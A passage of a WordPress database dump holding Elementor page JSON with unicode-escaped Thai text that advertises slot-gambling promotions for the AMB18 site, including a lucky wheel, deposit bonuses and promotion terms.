data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"879b024\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/lucky-wheel-Banner-Yok789.webp\",\"id\":276,\"size\":\"\",\"alt\":\"lucky wheel \",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07\\u00a0<\\/strong><b>AMB18\\u00a0<\\/b>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\"><span data-start=\\\"2414\\\" data-end=\\\"2445\\\"><b>AMB18 \\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/b><\\/span>\\u00a0\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3072,406,'_thumbnail_id','347'),(3075,407,'_elementor_edit_mode','builder'),(3076,407,'_elementor_template_type','wp-page'),(3077,407,'_elementor_version','3.35.5'),(3078,407,'_elementor_pro_version','3.32.3'),(3079,407,'_wp_page_template','default'),(3080,407,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(3081,407,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 AMB18 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e36\\u0e07\\u0e08\\u0e32\\u0e01 AMB18 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e40\\u0e15\\u0e34\\u0e21\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e25\\u0e38\\u0e49\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e44\\u0e14\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e31\\u0e19 \\u0e41\\u0e16\\u0e21\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e4a\\u0e01\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e21\\u0e14\\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e38\\u0e01 \\u0e46 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e15\\u0e32\\u0e21\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e1b\\u0e35\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e32\\u0e15\\u0e4c \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e14\\u0e39\\u0e04\\u0e38\\u0e49\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e2b\\u0e32\\u0e22\\u0e2b\\u0e48\\u0e27\\u0e07\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e17\\u0e33\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e44\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33 \\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e1a\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e2d\\u0e47\\u0e19\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e17\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27 \\u0e41\\u0e15\\u0e48\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e08\\u0e30\\u0e1b\\u0e31\\u0e07\\u0e41\\u0e04\\u0e48\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e25\\u0e37\\u0e21\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e04\\u0e39\\u0e48\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3b12e8f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/20-get-100-Banner-Yok789.webp\",\"id\":281,\"size\":\"\",\"alt\":\"20 get 100\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 